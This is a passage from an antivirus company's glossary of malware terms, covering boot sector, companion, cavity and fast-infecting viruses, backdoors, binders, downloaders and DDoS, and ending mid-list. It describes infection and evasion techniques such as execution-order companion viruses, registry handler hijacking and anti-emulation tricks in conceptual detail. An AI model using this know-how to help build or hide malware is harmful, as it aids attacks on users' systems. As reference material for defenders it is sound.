Unfortunately, there is no one standard, accepted rule for naming viruses. Hence, even though informal groups, such as CARO, have discussed conventions for virus naming, differences still exist between antivirus software companies and research organizations. Thus where the term ‘alias’ or ‘also known as’ occurs, it refers to different names that the same virus may be given by other sources. <br />
Annoyance<br />
Any trojan that does not cause damage other than to annoy a user, such as by turning the text on the screen upside down, or making mouse motions erratic.<br />
ANSI Bomb<br />
Character sequences that reprogram specific keys on the keyboard. If ANSI.SYS is loaded, some bombs will display colorful messages, or have interesting (but unwanted) graphical effects.<br />
Anti-antivirus Virus<br />
Another term for a retro-virus.<br />
Anti-emulation <br />
To reliably detect polymorphic viruses, scanners include code emulators to simulate the running of executable code and check whether it decrypts to a known virus. An emulator must stop emulating a program once it is no longer necessary to continue doing so and for performance reasons many emulators have simple rules for quickly determining a stopping point. Some polymorphic viruses include tricks attempting to defeat these code emulators by fooling them into quitting the emulation before the decryption code has finished its work. Such methods are commonly called anti-emulation techniques.<br />
Anti-heuristic <br />
Efforts by virus writers to avoid having their code detected as a possible new virus by heuristic detection are known as anti-heuristic techniques. What works depends on the heuristics approach of different scanners, but some code obfuscation techniques seem to clearly be anti-heuristic. <br />
Antivirus Virus <br />
The idea of making an antivirus program itself viral so it can propagate to where it is most needed is a very old one. Such a program would be an antivirus virus. It is universally agreed among reputable antivirus researchers to be a very bad - even dangerous - idea, and should be avoided at all costs. <br />
AOL Pest<br />
Any password stealer, exploit, DoS attack, or ICQ hack aimed at users of AOL. ICQ is an instant messenger service from mirabilis.com, now AOL. ICQ is a favorite service among hackers, and ICQ features are built into many trojans (such as stealing user's passwords, UINs, or notifying the hacker). Users of ICQ are warned "By using the ICQ service and software... you may be subject to various risks, including... Spoofing, eavesdropping, sniffing, spamming, breaking passwords, harassment, fraud, forgery, 'imposturing', electronic trespassing, tampering, hacking, nuking, system contamination including without limitation use of viruses, worms and Trojan horses causing unauthorized, damaging or harmful access and/or retrieval of information and data on your computer and other forms of activity that may even be considered unlawful."<br />
Appender<br />
A virus that inserts a copy of its code at the end of its victim file is known as an appender or appending virus. (c.f. Cavity Infector, Companion Virus, Overwriter, Prepender) <br />
Armored Virus <br />
Viruses that use special tricks to make tracing them in a debugger and/or disassembling them difficult are said to be 'armored'. The purpose of armoring is primarily to hinder virus analysts reaching a complete understanding of the virus' code. An early example of an armored virus is Whale. <br />
AV Killer<br />
Any hacker tool intended to disable a user's anti-virus software to help elude detection. Some will also disable personal firewalls.<br />
AVED <br />
AntiVirus Emergency Discussion list. <br />
A mailing list for professional antivirus researchers allowing them to alert other researchers to emerging or ongoing 'crisis' or 'emergency' virus events. These may be localized to a geographic or language-based region or known to be approaching a wordlwide scale. It also acts as a forum for these researchers to discuss such events, what precursors count as sufficient grounds to make posting alerts to users about a newly discovered virus and at what point involving the news media seems appropriate. Aside from the discussion list, another list facilitates the secure distribution of emergency samples and members of the list are expected to send samples of any viruses the organizations they work for consider worthy of raising public warnings about. Senior Computer Associates virus analysis staff are represented on the AVED mailing lists and board. (c.f. REVS) <br />
Return to top<br />
<br />
<br />
<b> B </b><br />
<br />
Backdoor (1)<br />
<br />
A program that surreptitiously allows access to a computer's resources (files, network connections, configuration information, etc) via a network connection is known as a backdoor or remote access trojan. Note that such functionality is often included in legitimate software designed and intended to allow such access. For example, software that allows remote administration of workstations on a company network, or that allows helpdesk staff to 'take over' a machine to remotely demonstrate how a user can achieve some desired result, are genuinely useful tools (and even desirable in many settings). The difference between backdoors or remote access Trojans and remote administration tools is that the latter are designed into a system and installed and used with the knowledge and support of the system administrator's and the other support staff they involve. <br />
Remote access trojans generally consist of two parts; a client component and a server component. In order for the trojan to function as a backdoor, the server component needs to be installed on the victim's machine. This may be accomplished by disguising the program in such a way as to entice victims into running it. It could masquerade as another program altogether (such as a game or a patch), or it could be packaged with a hacked, legitimate program that installs the trojan when the host program is executed.<br />
Once the server file has been installed on a victims machine, often accompanied by changes to the registry to ensure that the trojan is reactivated whenever the machine is restarted, the program opens a port so that the hacker can connect. The hacker can then utilise the trojan via this connection to issue commands to the victim's computer. Some remote access trojans even provide a message system, where the hacker is notified every time their victim logs onto the Internet.<br />
Here's an abbreviated list of things that a hacker can accomplish while controlling a victim's computer via a backdoor: <br />
• Upload/download files <br />
• Make changes to the registry <br />
• Delete files <br />
• Steal passwords and other confidential information <br />
• Log keystrokes <br />
• Rename files <br />
• Display images or message boxes <br />
• Disable the keyboard or mouse <br />
• Hide the taskbar, start button or desktop icons <br />
• Shutdown the computer or reboot the computer <br />
• Print <br />
• Run applications or terminate the currently running applications <br />
• Detect and initialise capture devices such as web cams or microphones <br />
• Disable antivirus or firewall software <br />
• Start an FTP server on the victim's machine that could make it accessible to other unauthorised intruders <br />
Backdoor (2)<br />
<br />
The term ‘backdoor’ is also frequently used as a synonym for a method for accessing a computer system or application that its maintainers or users are usually not aware of. Normally the term is used when the presence of this 'feature' is a secret. Such a feature whose presence is widely known - even if some arcane access method needs to be known to use it and remains a closely guarded secret - is unlikely to be referred to as a 'backdoor' unless its existence was uncovered by chance. Such surreptitious access mechanisms may be included by the developers without the knowledge of the system or application designer, or may be designed-in but kept from the customers or end users. This meaning of backdoor is of little immediate interest or relevance in the antivirus field.<br />
Bait File<br />
<br />
See the first meaning of Goat File. <br />
Bimorphic Virus<br />
<br />
An encrypted virus that has two forms of the decryption code, usually randomly selecting between them when writing its decryptor to a new replicant. (See Polymorphic Virus for more details; also see Oligomorphic Virus.) <br />
Binder<br />
<br />
A tool that combines two or more files into a single file, usually for the purpose of hiding one of them. A binder compiles the list of files that you select into one host file, which you can rename. A host file is a simple custom compiled program that will decompress and launch the source programs. When you start the host, the embedded files in it are automatically decompressed and launched. When a trojan is bound with Notepad, for instance, the result will appear to be Notepad, and appear to run like Notepad, but the Trojan will also be run.<br />
BIOS <br />
<br />
Basic Input/Output System. The program in a PC providing the lowest level of interface with the hardware. A PC's BIOS is also responsible for initiating the operating system bootstrap process by loading the boot sector of a diskette or the master boot record of a hard drive and passing control to it. <br />
Under CPM, DOS and Windows 3.x, BIOS interfaces to the hardware were paramount to the proper operation of the machine. Specialized hardware that standard BIOSes were not written to recognize and handle had to either include a BIOS extension on its adaptor card or provide device drivers allowing access to the device (or both) if they were to be used other than by proprietary software written to their hardware interface. More advanced OSes for the PC - such as the various Unixes written for it, NT, Linux, Windows 95 and so on - only depend on the BIOS for its OS bootstrapping function, providing their own (or vendor-supplied) protected mode drivers for all the hardware devices they can use. (Windows 9x allows a degree of real mode compatibility so it can be used on older machines with 'odd' hardware that is not supported by native drivers, but there are performance overheads.) <br />
Traditionally, the BIOS was supplied in a ROM chip plugged into a socket on the PC's mainboard. This arrangement allowed for the replacement of the BIOS, should that ever be necessary to accommodate new hardware requirements (or to supply bug fixes). More recently it has become standard practice to supply the BIOS in a flash memory (or flash ROM) chip, allowing updates to be written directly to the chip via software. <br />
The BIOS should not be confused with the CMOS storage area that is used to store BIOS and mainboard configuration options and data. <br />
Boot Code<br />
<br />
The program recorded in a boot sector is known as boot code. Boot sectors usually contain boot code because these small programs have the job of starting to load a PC's operating system once the BIOS completes its POST checks, although some types of boot sector seldom, if ever, contain boot code. Good examples of boot sectors that do not normally contain boot code are those at the head of extended partitions - under DOS and Windows OSes, such partitions cannot be made bootable so those OSes usually only place a partition table (which they do require) in such boot sectors. <br />
Thus, the system boot sectors of diskettes and partitions (logical drives) on hard drives, and the MBRs of hard drives, normally all contain boot code of some kind. It is this code, or at least the room reserved for it, that boot viruses target. Once the BIOS completes its hardware checks, it simply reads the appropriate boot sector (depending on which device it is set to boot from first and whether that device is ready) without doing any 'sanity checking' on its contents. <br />
Boot Infector <br />
<br />
See Boot Sector Infector. <br />
Boot Record <br />
<br />
The program recorded in the Boot Sector. All floppies have a boot record, whether or not the disk is actually bootable. Whenever you start or reset your computer with a disk in the A: drive, DOS reads the boot record from that diskette. If a boot virus has infected the floppy, the computer first reads the virus code (because the boot virus placed its code in the boot sector), then jumps to whatever sector the virus tells the drive to read, where the virus has stored the original boot record. <br />
Boot Sector <br />
<br />
A generic term encompassing system boot sectors and master boot records. Technically, this means the first logical sector of any drive (what DOS or Windows would consider to be sector 1 of that drive) and the MBR (sector 0,0,1 in CHS notation) of hard drives. As floppy disks do not have partitions, the logical drive and physical drive map sector for sector and their first logical sector is also 0,0,1. On hard drives, there is a boot sector for each logical drive (or partition, such as C: and D:) plus one for the MBR. (The 'root' entries of any extended partitions may or may not be counted - if so, the total number of boot sectors is higher than the preceding description suggests, with the final count depending on the number and nesting of extended partitions.) <br />
<br />
Most boot sectors contain boot code, which (under DOS and Windows) is usually created by FORMAT or SYS if the boot code is in a system boot sector, or by FDISK if in the master boot record of a hard drive. Sometimes the term 'boot sector' is ambiguously used to also refer to only the boot sectors of logical drives. This usage is avoided as far as possible in this glossary and the rarely used term 'system boot sector' used when this distinction needs to be made. <br />
Boot Sector Infector <br />
<br />
Every logical drive, both hard disk and floppy, contains a boot sector. This is true even of disks that are not bootable. These boot sectors usually contain specific information relating to the formatting of the disk (see BPB) and a small program - the boot code (which starts loading the system files of the active OS on that drive). The boot code is what displays the 'Non-system Disk or Disk Error' message familiar to those who have left a 'non-bootable' diskette in the A: drive of a PC when it booted. <br />
As well as these system boot sectors, hard drives also have a special boot sector known as a master boot sector or master boot record. As the boot code is a program, it can also be infected by a computer virus. Boot sector infections normally start from leaving an infected diskette in a PC's floppy drive and rebooting the machine. When the viral boot code is read from the boot sector and executed, the virus copies itself to a 'safe' place in memory, hooks disk I/O functions, infects the hard drive and remains resident, lying in wait for uninfected boot sectors to present themselves (these will usually be on diskettes accessed in the floppy drives). <br />
The safe memory location used by most boot viruses (and many file infectors too) is at the 'top of memory'. Brain - the first PC virus - was also the first PC boot sector infector. Although Brain was limited to diskette boot sectors, most boot viruses since typically infect the system boot sectors of floppy disks and the MBRs of hard drives. Perhaps the main advantage of this strategy is that the virus' code will always be the first to run, whichever drive type is booted from. Stoned was the first virus to implement this and in many ways remains the classic example of the technique. <br />
<br />
A few boot viruses, such as Form (which is perhaps most notable for its perseverance), infect the system boot sectors of both diskettes and hard drives. Some multipartite viruses have boot sector components that only infect MBRs while others have boot sector parts that only infect diskette or hard drive system boot sectors. Boot viruses can be polymorphic (for example, the boot component of the complexly multipartite Win95/Fono, can employ stealth techniques (Brain and many more since), and use many of the other techniques from the usual arsenal of virus tricks. <br />
<br />
In the early history of virus development, boot infectors were most commonly responsible for actual infections and featured prominently in the WildList. This was because of the high incidence of diskette sharing, that being by far the most common method of transferring data before connecting PCs to LANs and WANs became popular. Multipartite viruses with diskette boot sector components were the next most common viruses at that time, with Junkie probably being the best-known and most prevalent example. Straight file infectors barely showed in the WildList in those days. These patterns were entirely overturned as macro viruses embedded in documents became common and network (and particularly Internet) connectivity increased. <br />
Boot Virus<br />
<br />
A virus that infects boot sectors. Refer to Boot Sector Infector for more details. <br />
<br />
BPB <br />
<br />
BIOS Parameter Block. A data table in the system boot sector of all FAT format logical drives, containing information about the formatting of the drive. This includes details such as the number tracks, the number of sectors per track, the size of the sectors and the number of sectors per logical cluster, which are critical to reading the drive properly. <br />
Browser Helper Object<br />
<br />
(BHO). A component that Internet Explorer will load whenever it starts, shares IE's memory context, can perform any action on the available windows and modules. A BHO can detect events, create windows to display additional information on a viewed page, monitor messages and actions. Microsoft calls it "a spy we send to infiltrate the browser's land." BHOs are not stopped by personal firewalls, because they are seen by the firewall as your browser itself. Some exploits of this technology search all pages you view in IE and replace banner advertisements with other ads. Some monitor and report on your actions. Some change your home page.<br />
BSI <br />
<br />
Boot Sector Infector.<br />
Return to top<br />
<br />
<br />
<b> C </b> <br />
<br />
CARO <br />
<br />
Computer Antivirus Research Organization. An informal group of professional antivirus researchers committed to improving the state of the art. <br />
Cavity Infector <br />
<br />
A virus that searches for a 'hole' in the infection target and inserts its code there is known as a cavity infector. This infection technique has the advantage of not increasing the size of the target - a common telltale of viral infection that can giveaway the virus' presence to observant victims. Many programs have pre-initialized arrays (usually filled with null characters) and/or stack space filled with common patterns and viruses can easily search for areas matching these patterns. If a cavity infector finds a suitably sized 'hole', it copies itself into that hole then patches the program's entry point so the virus code runs first (or makes whatever other change to the host to gain control). This gives the virus a chance to copy itself elsewhere in memory or just run and be done with before the host program possibly uses the data area overwritten by the virus. Although cavity infection is a rarely used technique, one of the first parasitic file infectors Lehigh, was a cavity virus. See also Multiple Cavity Infector; c.f. Appender, Companion Virus, Overwriter, Prepender.<br />
<br />
CHS<br />
<br />
Cylinder, Head, Sector. The notation by which the location of a disk sector is supplied to some disk access routines. In this usage, the term 'track' is analogous to cylinder and 'side' (or occasionally 'surface') is analogous to head, but CHS/Cylinder, Head, Sector has the advantage of being non-ambiguous. <br />
Its significance in antivirus work is that boot sector viruses (particulalry MBR infectors) commonly make a 'safe' copy of the original contents of the sector they infect, and this is often located by a fixed CHS address. Thus, you may see descriptions of such viruses saying something like 'the original MBR is saved to 0,0,7' meaning, in this case, that the original MBR was saved to the seventh sector on head (or 'side') zero of cylinder (or 'track') zero. <br />
Class Infector<br />
A class infector is a macro virus whose code resides in one or more class modules. Class infectors became popular among macro virus writers shortly after the SR-1 (Service Release 1) version of Word 97 became available. With that version of Word, Microsoft introduced an undocumented antivirus feature that prevented the successful replication of most existing Word macro viruses. Under that version of Word, the most that earlier viruses can do is infect the normal template. They are not able to spread from there to documents. (This feature is present in all later versions of Word, including Word 98 for the Macintosh). Class infection, per se, was not necessary to subvert the SR-1 measures, but the first virus writer who realized what was happening coincidentally moved to infecting the default document class object. <br />
Cluster Virus <br />
Apart from directly infecting host files as appenders and prependers do, there are other ways to intercept calls to an executable file and have some other code run instead of, or before, the code from the intended file. One such method is cluster infection, used by a small number of DOS viruses. <br />
On a FAT file system this method usually involves saving the virus' code to the hard drive then altering the directory entry of an 'infected' file. The required directory entry change is to set the field that points to the first cluster of the file to the cluster holding the virus code and record the original initial cluster of the infected file in an unused field in the directory entry. When the user tries to execute an infected program, the operating system reads the virus from the apparent first cluster of the executable file and runs it. The virus does whatever else it is designed to do then loads and executes the original file, using the correct first cluster information it saved during the infection process. Dir-II was the first cluster virus and in the wild for some time. <br />
Because the cluster infection technique interferes with the linking of cluster chains apparently assigned to a file, these viruses are occasionally referred to as 'link viruses', although this usage should be avoided. <br />
CMOS <br />
<br />
Complementary Metal Oxide Semiconductor: The battery backed RAM used in AT and later PCs to store hardware configuration information uses CMOS technology. As this memory is not in the CPU address space, but addressed via I/O port reads and writes, its contents cannot be directly executed. This means that viruses cannot reside in nor infect the CMOS RAM. Some viruses alter the contents of the CMOS RAM as a payload, either scrambling them or removing the reference to the floppy drive so the hard drive's (infected) MBR will always run first during boot-up. <br />
Collection Virus <br />
See Zoo Virus (c.f. In the Wild). <br />
Commercial RAT<br />
<br />
Any commercial product that is normally used for remote administration, but which might be exploited to do this without user consent or awareness.<br />
Companion Virus <br />
<br />
There are other methods of infecting a system other than the most commonly used one of modifying an existing file (see Parasitic Virus. Given the way command-line interpreters (or shells) of several operating systems work, a virus can copy itself onto the system as an entire program yet be sure that much of the time, attempts to invoke a program will result in the virus' code being run first. Such programs are known as companion viruses and there are several forms of this infection method. <br />
For example, under DOS (and at least from the command-line or 'Command Prompt' of its Windows relatives), if the shell is given a command that does not begin with a fully-specified filename, it searches the current directory, then each directory in the PATH environment variable (in the order they are listed), for a COM file matching the command name, then an EXE file and then a BAT file. Thus, a companion virus can 'infect' an EXE file by copying itself to the same directory as that file and using its filename but with a COM extension. (Similarly a BAT file could be 'infected' by copying the virus code to either an EXE or COM with the same filename.) Once the virus has done its work, it loads and executes the original program file. If the virus acts quickly the user is unlikely to notice the short delay this introduces and the fact the target runs 'normally' also reduces the likelihood of user suspicion. This infection technique is known as the program execution order companion method or the execution precedence companion method. <br />
Another companion infection method should be obvious from the preceding description of DOS' command interpretation process. Known as the path order companion method or the path precedence companion method, it depends on a copy of the virus being made in a directory earlier in the path than the directory housing the target. The virus file is given the same name as the target file (although it need not have the same extension - any executable extension will do) so the virus program will be found and executed instead of its target. As with execution order companions, path companions must take steps to ensure the original program runs after the virus has done its thing. Unlike execution order companions, path companions should also be successful on operating systems that do not depend on filename extensions to determine whether a file is 'executable', so long as they have something akin to the concept of a PATH variable. <br />
Yet another companion infection method involves renaming the target program to a non-executable extension then copying the virus to the same location, filename and extension as the target. When the user calls the program, instead of the intended one running, the virus is executed. Again, to avoid immediate detection, such renaming companion viruses must load and execute the original program. This approach has the advantage of being more likely to work under GUI shells (such as the Windows desktop) because such environments usually record full path and filenames when configuring desktop and menu shortcuts and the like. Under such an environment, path and execution order companions will have little effect as they leave the original program intact. Of course, replacing the original program as a renaming companion virus must, makes them much more visible to integrity checking methods. <br />
Although quite simple (because they are not required to alter existing executable files), companion viruses have been rarely seen until recently, when another companion infection technique started to become popular. Windows 95 and NT introduced (or, more correctly, promoted) more complex techniques for controlling how the usual operating system shell (normally Windows Explorer) handles files. Complex inter-relationships between file extensions and more finely described file types exist in the registry. For example, handling of EXE files is defined through a series of values in HKEY_CLASSES_ROOT. This sequence includes a handler for the 'opening' of EXE files. Normally the shell just loads and executes EXE files, much as earlier versions of Windows and DOS did. However, this can be usurped by altering the appropriate registry values so another program runs. So long as the introduced handler launches the original EXE 'as normal', the user will not become suspicious. <br />
Companion infection methods that do not involve replacing the target program defeat simple integrity checkers that only look for modifications to existing programs. For this reason, good integrity checkers also monitor the addition of new program files to a system. (c.f. Appender, Cavity Infector, Overwriter, Prepender) <br />
Constructor Kit <br />
Some virus writers are not content with writing their own viruses and have wondered about bringing the 'opportunity' of becoming a virus writer to the masses. The solution to this is usually some form of 'construction kit' - a program even a non-programmer can run, feed some parameters into and then produce a virus. Many have been produced over the years covering simple COM and/or EXE infectors, polymorphics, batch, macro and script viruses. Perhaps the best-known of the early ones were the Virus Construction Laboratory (VCL) and Phalcon/Skism Mass-Produced Code Generator (MS-MPC). <br />
Cracking Misc<br />
<br />
Any document and/or tool that provides guidance on how to remove copy protection.<br />
Cracking Tool<br />
<br />
Any software designed to modify other software for the purpose of removing usage restrictions. An example is a 'patcher' or 'patch generator', that will replace bytes at specified locations in a file, rendering it a licensed version. A music file ripper is a program that enables the user to digitally copy songs from a CD into many different formats such as MP3, WAV, or AIFC.<br />
Return to top<br />
<br />
<br />
<b> D </b> <br />
<br />
Data Diddlers<br />
This is a popular name for a virus that contains a data modifying payload. This type of virus may, for example, change 0's to 9's in an Excel spreadsheet or, like Jal.A, it may replace certain words. Unfortunately, the changes made by some of these viruses may be almost unnoticable in large amounts of data. Hence, users may not realize that they are infected for quite some time, necessitating possibly lengthy and costly clean-up procedures.<br />
DDoS, DDOS<br />
Distributed Denial of Service. Attempts to DoS large sites using most forms of resource exhaustion attack, and particularly network bandwidth wasting strategies, are often impossible for a single attacking machine because of the sheer scale of resources available to the attacked site. One solution to this is the distributed denial of service approach, whereby a number of machines with 'attack services' installed on them are simultaneously commanded to attack a target system. Each of these DDoS 'agents' contributes part of the total 'load' that eventually topples the attacked service or server, or each agent contributes part of the bandwidth necessary to clog the network connections to the attacked server. See also Denial of Service. <br />
<br />
By late 1999, code from several DDoS systems had been captured from compromised machines. These were mostly the agents (the part that implements the attack service), but a few examples of masters - the component that keeps track of the agents availability and sends the commands to begin and end an attack - were also captured. At the time, some networks of these DDoS agents were discovered to contain several hundred active agents. Although most of these systems have been designed and written for Unix (and particularly Linux) machines, some implementations for PCs also exist. (Refer to the DDoS entry in the virus encyclopedia for more details.) <br />
Decoy File<br />
<br />
See the first meaning of Goat File. <br />
Denial of Service <br />
<br />
An attack on a computer system intended to reduce, or entirely block, the level of service that 'legitimate clients' can receive from that system. These range in scope from network bandwidth wasting and/or swamping through exhausting various machine resources (memory, disk space, thread or process handles, etc) required by the process(es) providing the service. They usually work by exploiting vulnerabilities that eventually crash the service process or the underlying system. Although not commonly associated with viruses, denial of service components are included in some viral payload routines. (Also see DDoS.) <br />
Destructiveness<br />
This is measured based on the amount of damage that a malicious program can possibly achieve once a computer has been infected. These metrics can include attacks to important operating system files, triggered events, clogging email servers, deleting or modifying files, releasing confidential information, performance degradation, compromising security settings, and the ease with which the damage may be fixed. CA uses this metric to measure the potential damage that a malware's payload can deliver. This metric is given the least weight, in combination with Wild and Pervasiveness metric, to calculate the overall threat assessment.<br />
Dialer<br />
<br />
Software that dials a phone number. Some dialers connect to local Internet Service Providers and are beneficial as configured. Others connect to toll numbers without user awareness or permission.<br />
Direct Action <br />
<br />
A virus that attempts to locate and infect one or more targets when it is run, and then exits is referred to as direct action virus. In single-tasking operating systems such as DOS, direct action viruses usually only infect a small number of targets during each run, as the 'find then infect' process slows the normal execution of the infected host from which the virus is running and significant slowing of a machine is likely to warn its user of the presence of something 'untoward'. (c.f. Resident) <br />
DOS (DoS)<br />
<br />
1. Disk Operating System - most famously, MS DOS and IBM DOS, but also DR DOS and others. <br />
2. Denial of Service (although the acronym DoS is somewhat preferable here to avoid confusion). <br />
Downloader<br />
<br />
A downloader is a program that automatically downloads and runs and/or installs other software without the user's knowledge or permission.<br />
In addition to downloading and installing other software, it may download updated versions of itself.<br />
A downloader may install itself in a manner that allows it to constantly check for updated files. For example, it may add an entry to the following registry key:<br />
HKLM\Software\Microsoft\Windows\CurrentVersion\Run<br />
Dropper <br />
<br />
A program that installs a virus, but is not, itself, infected is known as a dropper. These are not very common and probably most are for installing boot viruses. <br />
Return to top<br />
<br />
<br />
<b> E </b> <br />
<br />
EEPROM <br />
Electrically Erasable and Programmable Read-Only Memory. <br />
A type of ROM whose contents are non-volatile but modifiable through the application of appropriate chip reprogramming voltages. EEPROM was an advance on EPROM technology, replacing the requirement for a source of ultra-violet light with a purely electronic mechanism to erase a chip's contents. Some early 'updateable BIOSes' were shipped on EEPROM chips, but flash memory has become the preferred non-volatile memory technology for holding BIOSes in recent years. <br />
EICAR <br />
<br />
European Institute for Computer Antivirus Research. <br />
A group of academics, researchers, law enforcement specialists and other technologists united against 'writing and proliferation of malicious code like computer viruses or Trojan Horses, and, against computer crime, fraud and the misuse of computers or networks' (to quote from the mission statement on the EICAR web site). <br />
E-mail Worm<br />
<br />
A commonly used misnomer for mass mailing viruses <br />
Embedded tags or cross site scripting<br />
This vulnerability occurs when a web server performs inadequate checks on content provided by third parties. A remote attacker may be able to embed a script in a piece of text which is then reproduced onto a web site. Legitimate users of the system may then inadvertently run the script when the innocently connect to the attackers information. <br />
Emulator <br />
<br />
A commonly used method for detecting polymorphic viruses is to simulate running part of a program's code in an emulator. The purpose is to see if the code decrypts known virus code. There are several essentially irresolvable issues with emulator design. For example, ensuring they don't run for 'too long' on each file thus slowing the scanner down, and making them complex enough to include sufficient aspects of the environment they simulate that anti-emulation and emulation detection techniques employed in some viruses do not reduce their usefulness. <br />
Encrypted Virus <br />
<br />
An early attempt at evading scan string driven virus detectors was self-encryption with a variable key. Cascade was the first example of an encrypting virus, but this approach was not much of a challenge to scanners as the decryption code of such viruses is constant across replicants and thus can be used as a scan string. Of course, if another virus or program uses the same decryption routine, precise identification of each would require reliably detecting more than just the common decryption code. Extending the idea of an encrypting virus so as to beat the limitation of scanners detecting just the decryption code resulted in the development of polymorphic viruses. <br />
Encryption Tool<br />
<br />
Any software that can be used to scramble documents, software, or systems so that only those possessing a valid key are able to unscramble it. Encryption tools are used to secure information; sometimes unauthorized use of encryption tools in an organization is a cause for concern.<br />
Entry Point Obscuring Virus <br />
One technique virus writers have tried to make it more difficult for a scanner to detect a virus is entry point obscuration. Simple parasitic viruses alter the code at the entry point of their hosts in some way. Some alter the fields in the executable's header so the pointer to the start of the program's code points to where the virus' code has been inserted or added to the file. Others leave the header alone, but alter the original program code at the entry point itself, either inserting the virus there, or inserting or overwriting code to jump to the virus' code elsewhere in the executable. These approaches pose no problems for virus scanners as most scanners adopted entry point tracing techniques long ago to speed up their scanning. Entry point tracing meant that instead of grunt scanning a whole executable file, only the parts of an executable that were likely to contain a virus' code were scanned. <br />
Entry point obscuring (EPO) viruses employ various methods in attempts to complicate entry point tracing, by inserting the virus' code elsewhere in the target executable than at the entry point of the host program's code. Several approaches have been used. The crudest is randomly inserting the virus' code into the target and 'hoping' both that this does not corrupt the program and that execution branches through the code at the insertion point often enough to give the virus a chance to replicate. More sophisticated methods involve disassembling the host looking for a suitable code sequence (such as an interrupt call or a long jump) to replace with a call to the virus. A minor variation on this, but easier to implement, is to simply scan the host for a suitable byte sequence. However, this involves the risk that the target sequence may be found somewhere that it does not represent the intended machine code sequence and thus infection will corrupt the executable. The first viruses to use EPO techniques were Omud and Lucretia. <br />
EPO <br />
Entry Point Obscuring. <br />
EPROM <br />
<br />
Erasable and Programmable Read-Only Memory. <br />
A type of ROM whose contents are non-volatile but modifiable through the application of appropriate chip reprogramming voltages. Before reprogramming an EPROM, it has to be exposed to source of ultra-violet light. Some early 'updateable BIOSes' were shipped on EPROM chips, but EEPROMs became more popular. More recently, flash memory has become the preferred non-volatile memory technology for holding BIOSes. <br />
Error Hijacker<br />
<br />
Any software that resets your browser's settings to display a new error page when a requested URL is not found. Hijacks may reroute your info and address requests through an unseen site, capturing that info. In such hijacks, your browser may behave normally, but be slower.<br />
Exploit<br />
<br />
A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it. Exploits are the root of the hacker culture. Hackers gain fame by discovering an exploit. Others gain fame by writing scripts for it. Legions of script-kiddies apply the exploit to millions of systems, whether it makes sense or not. Since people make the same mistakes over-and-over, exploits for very different systems start to look very much like each other. Most exploits can be classified under major categories: buffer overflow, directory climbing, defaults, Denial of Service.<br />
Return to top<br />
<br />
<br />
F <br />
<br />
False Positive, False Negative <br />
<br />
These terms derive from their use in statistics. If it is claimed that a file or boot sector is infected by a virus when in reality it is clean, a false positive (or Type-I) error is said to have occurred. Conversely, if a file or boot sector that is infected is claimed to not be infected, a false negative (or Type-II) error has been made. From an antivirus perspective, false negatives probably seem more serious than false positives, but both are undesirable. False positives can cause a great deal of down-time and lost productivity because proving a program cannot replicate under some condition or other is generally much more time consuming than discovering the conditions under which a viral program will replicate. <br />
With good known-virus scanners, false positives are rare. However, they can arise if the scan string for a virus is poorly chosen, say because it is also present in some benign programs. False negatives are a more common problem with virus scanners because known-virus scanners tend to miss completely new or heavily modified viruses. False positives have, historically, been quite a problem for scanners that make heavy use of heuristic detection mechanisms. <br />
Another related, serious problem is the situation where a scanner detects a virus, but incorrectly identifies which. Such misdiagnosed positives can lead to terrible problems if the scanner, or its user, then engages in a virus-specific disinfection routine based on detailed knowledge of the 'detected' virus' characteristics. 'Generic disinfection' procedures are not entirely immune from such problems either. <br />
Fast Infector <br />
<br />
When programs infected with common file infectors (such as Jerusalem in days of yore, and many others since) are run, the virus code usually gets control first. It then checks it has not already gone resident, copies itself into memory, and hooks a system interrupt or event handler associated with the host platform's 'load and execute' function. When that function is subsequently called, the virus' infection routine runs, checking whether the program that is about to run has been infected already, and infecting it if not. <br />
In contrast, a fast infector not only infects programs as they are executed, but even those that are just opened. Even more aggressive fast infectors will infect suitable targets as they are accessed in the most peripheral of ways, such as by reading their directory information as happens during a 'DIR' listing under DOS, or Explorer accessing a directory to display its contents under Windows. Thus, if a fast infector is active in memory, running a virus scanner or integrity checker can result in all of the virus' potential victim files being infected. Early examples were the Dark Avenger and Frodo viruses and more recently CIH became very widespread, partly as a result of being a fast infector. (c.f. Slow Infector) <br />
Note that, technically, most macro viruses are fast infectors. For example, Word macro viruses tend to infect the Word application environment (by deliberately targeting one or more global templates) so they are always present in the Word environment following initial infection. Also, most utilize some form of auto or system macros, or standard event handlers, which are normally triggered during the opening, closing or other user-initiated processing of document files (saving, for example) within the Word application environment. However, unlike executable infectors, such macro viruses are not spread by normal virus scanners, as the finding and opening of files occasioned by the use of a scanner happens outside the host application's environment (i.e. it is the operating system's file processing functions being used, not those of Word, Excel, etc and thus the viral macros are not invoked during this processing of the files). <br />
Also note that residency is associated with fast infection. This was a poorly chosen term, as it was settled on before multi-threaded or multi-process operating systems were targeted by viruses. A virus can be written for such systems to run as a separate process from its host, staying loaded as long as it takes it to find and infect all potential victim files, then exit (this has been done, for example by Libertine.31672.). As this results in the near-immediate infection of all hosts, the term 'fast infector' probably seems a good description for such a virus despite it being a direct action infector. However, the term 'fast infector' is intended for resident viruses that infect on most file accesses - the development of such viruses resulted in the addition of memory scanning to on-demand virus scanners. <br />
Fast Mailer <br />
<br />
Another term for Mass Mailer. <br />
FAT <br />
<br />
File Allocation Table. <br />
A crucial part of the standard file systems employed in all versions of DOS and Windows 9x. The FAT records the chaining of disk clusters and the final cluster in a file. A file's first cluster is stored in its directory entry and also acts as an offset into the FAT's chaining table so the rest of the file can be located. <br />
FAT16 file systems were limited to logical drives with a maximum of 65,536 clusters. Thus, as drives got larger, slack space wastage increased as the cluster size had to be increased to keep the cluster count at or under 65,536. FAT32 file systems, introduced in the OEM Service Release 2 (OSR2) version of Windows 95 and supported by Windows 98, ME and Windows 2000, extend the FAT file system to support huge drives (up to 2 Terabytes) and allow much larger drives to retain relatively efficient, smaller cluster sizes, reducing slack space wastage. <br />
Technically, most so-called FAT hard drive partitions are actually FAT16 partitions, but the number is usually assumed. Standard sized 'DOS format diskettes' still use the original FAT12 standard, which has always been used on DOS diskettes. <br />
Field Sample, Field Virus <br />
<br />
See In the Field. <br />
File Infector<br />
<br />
These are viruses that attach themselves to (or replace; see Companion Virus) .COM and .EXE files, although in some cases they will infect files with other extensions such as .SYS, .DRV, .BIN, .OVL, .CPL, .DLL, .SCR and others. The most common file viruses are resident viruses, loading into memory at the time the first copy is run, and taking clandestine control of the computer. Such viruses commonly infect additional program files as they are run or even just accessed. But there are many non-resident viruses, too, which simply infect one or more files whenever an infected file is run. <br />
File race condition<br />
<br />
